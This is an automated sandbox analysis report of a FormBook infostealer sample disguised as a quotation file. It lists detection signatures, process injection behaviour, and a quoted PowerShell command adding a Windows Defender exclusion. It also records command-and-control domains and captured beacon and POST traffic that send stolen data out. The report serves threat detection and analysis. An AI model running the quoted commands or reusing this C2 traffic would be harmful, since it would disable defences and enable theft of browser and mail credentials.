Edit tour

Windows Analysis Report
QUOTATION NO REQ-19-000640.exe

Overview

General Information

Sample name:	QUOTATION NO REQ-19-000640.exe
Analysis ID:	1617028
MD5:	1a04f1ec2b9760853adc698e920df169
SHA1:	2ecae33a0e32af56e8b88de882f3cd03c71be97e
SHA256:	c7d74ae26564e2f86c6c7f5369e2ba02f5a09d70a30630c2e67e5376ed7f4fb6
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Update Standalone Installer command line found (may be used to bypass UAC)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

QUOTATION NO REQ-19-000640.exe (PID: 820 cmdline: "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe" MD5: 1A04F1EC2B9760853ADC698E920DF169)

powershell.exe (PID: 7316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 7332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

KVNT56jRlfzS0OWcgx3s5.exe (PID: 6800 cmdline: "C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\Wti9sRwIJ.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

wusa.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\wusa.exe" MD5: EB96F0F207F203DD0B6D8A2625270495)

SearchIndexer.exe (PID: 7892 cmdline: "C:\Windows\SysWOW64\SearchIndexer.exe" MD5: CF7BEFBA5E20F2F4C7851D016067B89C)

KVNT56jRlfzS0OWcgx3s5.exe (PID: 524 cmdline: "C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\DCN5kB2DFxrwQm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 8184 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000F.00000002.3749397326.0000000003350000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3735374231.0000000002B80000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.3749270858.0000000003300000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.3751418671.0000000004D10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1747889466.0000000002790000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1745726958.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.1747623223.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000D.00000002.3749267228.0000000002D00000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: QUOTATION NO REQ-19-000640.exe PID: 820	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", ParentImage: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe, ParentProcessId: 820, ParentProcessName: QUOTATION NO REQ-19-000640.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", ProcessId: 7316, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", ParentImage: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe, ParentProcessId: 820, ParentProcessName: QUOTATION NO REQ-19-000640.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe", ProcessId: 7316, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.covsds.info/suwf/	Avira URL Cloud: Label: malware
Source: http://www.sscexampyq.watches/y1q6/	Avira URL Cloud: Label: malware
Source: http://www.trustai.chat/h6qg/?s2udI=uikWmaZCBMIlJE5jB+iLXU0ON5kHtPARMVu+z760NAm1BfF9Gs6GAotBWwOf+oJO8kbYBm1lOr5/QDNM8lFwlij5dtkltmarS/mBWMrhaX836wZJAE+N8BeFXIm9zqFHQ2aJJ06xy3tg&5F1X=BZbDy	Avira URL Cloud: Label: malware
Source: http://www.covsds.info/suwf/?s2udI=hc0IKpURi6ZtRi6kC1NC4cefXWVhUndfb/24uPJ4hxTETrHwlt/Nt2AwJwh2AE/dg/kzaAXtzJsVHUc+UoZFdooYXemsHdVT5/IyYxB77yVI3SNsh9ZnF81VCHXFXRNwjmXFVVH8K1+I&5F1X=BZbDy	Avira URL Cloud: Label: malware
Source: http://www.askvtwv8.top/2875/	Avira URL Cloud: Label: malware
Source: http://www.hugeblockchain.xyz/tq56/?s2udI=YjB5ACHj2x9IADvDl4xsQ5qemdc+Yp5TazzExUDp0r9PYQqL2kaV6f2zq4x7nxu1RBV1KB8Kbb5pipiXXrZPjte5eq9JhQoZqG6PrhmgveABbKBn4KXJNBnMTHe8XUdU0cq+bD9Db6mG&5F1X=BZbDy	Avira URL Cloud: Label: malware
Source: http://www.hugeblockchain.xyz/tq56/	Avira URL Cloud: Label: malware
Source: http://www.trustai.chat/h6qg/	Avira URL Cloud: Label: malware
Source: http://www.sscexampyq.watches/y1q6/?s2udI=IG5fEylu31HQXBX5CTU/CrJE3AUBKyqkGoXjI76zg4k5h5TLStPQvIYvuUujWejAakPmfrKTrmVJan4jnqfLqun4ouJkFG+zWovEceb0dYW032nF7CrwjRpfMlqej+aOpwsuYqsv/URw&5F1X=BZbDy	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: QUOTATION NO REQ-19-000640.exe	ReversingLabs: Detection: 75%
Source: QUOTATION NO REQ-19-000640.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3749397326.0000000003350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3735374231.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3749270858.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3751418671.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747889466.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1745726958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747623223.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3749267228.0000000002D00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: QUOTATION NO REQ-19-000640.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: QUOTATION NO REQ-19-000640.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wusa.pdbGCTL source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000003.1682869226.0000000000754000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SearchIndexer.pdb source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000003.1683335658.00000000055E8000.00000004.00000001.00020000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000003.1683066855.0000000005529000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wusa.pdb source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000003.1682869226.0000000000754000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sRfw.pdb source: QUOTATION NO REQ-19-000640.exe
Source:	Binary string: sRfw.pdbSHA256g source: QUOTATION NO REQ-19-000640.exe
Source:	Binary string: RegSvcs.pdb, source: SearchIndexer.exe, 0000000F.00000002.3742460427.00000000030EB000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000002.3750231153.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3749558176.00000000028DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2048464539.0000000002AEC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.1746455564.0000000001990000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000003.1748065831.000000000338E000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000002.3749700595.0000000003540000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000002.3749700595.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000003.1746041626.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.1746455564.0000000001990000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, SearchIndexer.exe, 0000000F.00000003.1748065831.000000000338E000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000002.3749700595.0000000003540000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000002.3749700595.00000000036DE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000003.1746041626.00000000031D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SearchIndexer.pdbUGP source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000003.1683335658.00000000055E8000.00000004.00000001.00020000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000003.1683066855.0000000005529000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: SearchIndexer.exe, 0000000F.00000002.3742460427.00000000030EB000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 0000000F.00000002.3750231153.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3749558176.00000000028DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2048464539.0000000002AEC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000000.1665628478.0000000000D3F000.00000002.00000001.01000000.0000000D.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3748933465.0000000000D3F000.00000002.00000001.01000000.0000000D.sdmp

Source: C:\Windows\SysWOW64\SearchIndexer.exe

Code function: 15_2_02B9C8A0 FindFirstFileW,FindNextFileW,FindClose,

15_2_02B9C8A0

Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 4x nop then xor eax, eax	15_2_02B89ED0
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 4x nop then pop edi	15_2_02B8E3FB
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Code function: 4x nop then mov ebx, 00000004h	15_2_034504DE

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.031235066.xyz
Source:	DNS query: www.themutznuts.xyz
Source:	DNS query: www.hugeblockchain.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /3r0a/?s2udI=sKrGu7TksCHIK7kt9d+oBb/o/lTgU1ThNyFh3V6hdiwbmsQAYJlrpXZ03H5ZuiozzGpLnK6LxO9bRNnyv4DidbdmGBT4jqPZlN0px+AXVb8PvNdXQaR9AOfcuJInI19vTK/FnoXpbSye&5F1X=BZbDy HTTP/1.1Host: www.tyxxg.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m0ti/?s2udI=Ou0JAR+tYzIA9MyelwAxj4qt/yg4+Yx8jZva/+6MDoXJNxiaUhfZ+HACoujhWm7f9cAzAqakt7n15BgMAntQA6TYngcejwlUH/kO9qe0eJ3NWqDyQUIeeux8kUUyhpQPy+I/2/ziCRmR&5F1X=BZbDy HTTP/1.1Host: www.kpilal.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mz55/?s2udI=C30fmv4Wuezg7lRYTXscPfxFXbu3kmhHcEAkLxR3ckCf55wYZSgRJ5GwbZ/nGE+r/EscUIU3mx7SaJqQCMGp4atM5g53hm/0IIwJThCz5aG8OUqBQoW+R1PeNNKGc7Fc+g8WkEn04I8O&5F1X=BZbDy HTTP/1.1Host: www.safitri.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /y1q6/?s2udI=IG5fEylu31HQXBX5CTU/CrJE3AUBKyqkGoXjI76zg4k5h5TLStPQvIYvuUujWejAakPmfrKTrmVJan4jnqfLqun4ouJkFG+zWovEceb0dYW032nF7CrwjRpfMlqej+aOpwsuYqsv/URw&5F1X=BZbDy HTTP/1.1Host: www.sscexampyq.watchesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /rb29/?5F1X=BZbDy&s2udI=W32nhWaG3a0D5KYQX+9hHOOWd90oVBXbnDHxsKqmyel3o0rrJJfo3X+ahuLxan/dy43dnsV1eRwNfnZVKPHo9AxbMWZYIOYeIzep3vt4bflkNfJRdEy15d65ZdEpCFJ4MMCEd6amlbB7 HTTP/1.1Host: www.liveseam.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ac8a/?s2udI=e+dm5Qaqig4MvsJ53Iyz6c4vpggJnnVYfg8an4l4r3LSQ5iluKhAjPm9r2BzG6Jfx8wTh6yO3hZofIWC4I4jrp0a88czxoxV+TWEFtMKVH8ykUEdicEI3LAXcajRnnT4goLvoxEyDWpe&5F1X=BZbDy HTTP/1.1Host: www.031235066.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /h6qg/?s2udI=uikWmaZCBMIlJE5jB+iLXU0ON5kHtPARMVu+z760NAm1BfF9Gs6GAotBWwOf+oJO8kbYBm1lOr5/QDNM8lFwlij5dtkltmarS/mBWMrhaX836wZJAE+N8BeFXIm9zqFHQ2aJJ06xy3tg&5F1X=BZbDy HTTP/1.1Host: www.trustai.chatAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /82sz/?s2udI=4miAjaaxDsM2AW0zp2inQDW1rhhEmC+9av7M5SObyU9ECy6FS80b1bC9tdHYEhNgF/WCu6i1gzuZOnV7ta9V0nVB3HgZjf+iG8TJuAdTnKPxQbX/l9zz8QS4gGa5kkoKSvzQ3rllSbi/&5F1X=BZbDy HTTP/1.1Host: www.themutznuts.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /d10e/?s2udI=9om/V1/F1aF8GYdHTo6z9Yn4j8LNkkj+/pOTN4TUC8O+l9nES5gQzku5glkUD+PBwpKQHHkDQEUSOdYowSgTZB1U/nV+iU081qVWKBH/kXeyufre8qYdbxPbWpmh6S3Qz2KMkX7PH/CN&5F1X=BZbDy HTTP/1.1Host: www.fjlgyc.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /suwf/?s2udI=hc0IKpURi6ZtRi6kC1NC4cefXWVhUndfb/24uPJ4hxTETrHwlt/Nt2AwJwh2AE/dg/kzaAXtzJsVHUc+UoZFdooYXemsHdVT5/IyYxB77yVI3SNsh9ZnF81VCHXFXRNwjmXFVVH8K1+I&5F1X=BZbDy HTTP/1.1Host: www.covsds.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tq56/?s2udI=YjB5ACHj2x9IADvDl4xsQ5qemdc+Yp5TazzExUDp0r9PYQqL2kaV6f2zq4x7nxu1RBV1KB8Kbb5pipiXXrZPjte5eq9JhQoZqG6PrhmgveABbKBn4KXJNBnMTHe8XUdU0cq+bD9Db6mG&5F1X=BZbDy HTTP/1.1Host: www.hugeblockchain.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2875/?s2udI=Z5Zz2ynBwHHMZwqObEXmdlPw4QI7u1EBlBs0IsdgbFIB5daHgszbFFGrD0JTMtXpL9P3/enNrzhGSSd589woyJUcZlvybM8mlsbCO7COhGILfq4ZPYVl3SvtsC558fbgJ88Be+WpB9OP&5F1X=BZbDy HTTP/1.1Host: www.askvtwv8.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /am6a/?s2udI=89S2v9JtjK6s7t3Ro9carC4i73BTCuakhWC9Y1B7nGWWwL49Ix/Zy4HQKMdkD5KRfCxF+a0btwfpgLU0cBbwF0eGnBMJWmiLpf4+QbZd9uD7LiRfw52X8H13LRR8GuEAlvzeruWZrC8E&5F1X=BZbDy HTTP/1.1Host: www.lucynoel6465.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.tyxxg.net
Source: global traffic	DNS traffic detected: DNS query: www.kpilal.info
Source: global traffic	DNS traffic detected: DNS query: www.safitri.shop
Source: global traffic	DNS traffic detected: DNS query: www.sscexampyq.watches
Source: global traffic	DNS traffic detected: DNS query: www.liveseam.live
Source: global traffic	DNS traffic detected: DNS query: www.031235066.xyz
Source: global traffic	DNS traffic detected: DNS query: www.trustai.chat
Source: global traffic	DNS traffic detected: DNS query: www.themutznuts.xyz
Source: global traffic	DNS traffic detected: DNS query: www.eceza.net
Source: global traffic	DNS traffic detected: DNS query: www.fjlgyc.info
Source: global traffic	DNS traffic detected: DNS query: www.covsds.info
Source: global traffic	DNS traffic detected: DNS query: www.hugeblockchain.xyz
Source: global traffic	DNS traffic detected: DNS query: www.askvtwv8.top
Source: global traffic	DNS traffic detected: DNS query: www.lucynoel6465.shop

Source: unknown

HTTP traffic detected: POST /m0ti/ HTTP/1.1Host: www.kpilal.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.kpilal.infoContent-Type: application/x-www-form-urlencodedContent-Length: 218Cache-Control: max-age=0Connection: closeReferer: http://www.kpilal.info/m0ti/User-Agent: Mozilla/5.0 (Linux; Android 5.0; E5363 Build/27.1.B.1.106) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Data Raw: 73 32 75 64 49 3d 44 73 63 70 44 6e 2b 70 66 78 73 48 72 2f 69 72 38 32 4e 4f 38 5a 48 38 36 6a 41 7a 33 6f 5a 36 77 72 48 38 74 61 47 6d 66 4d 50 30 4d 46 2f 69 44 48 53 45 37 68 73 33 76 72 2f 2f 42 48 54 70 79 63 67 50 44 59 53 6c 71 70 54 52 72 52 31 4e 4c 6e 52 32 50 34 44 59 76 68 41 33 69 78 78 6d 4d 50 63 69 30 70 43 63 5a 4c 6e 58 62 72 62 51 56 48 39 62 66 66 34 41 69 57 4a 33 77 59 41 4b 35 64 67 74 6d 2f 4f 43 43 78 32 4d 52 48 37 61 37 46 47 41 71 39 2b 6d 6a 78 67 2f 61 43 38 70 70 46 43 47 4e 66 79 49 53 53 79 57 5a 74 47 77 63 69 62 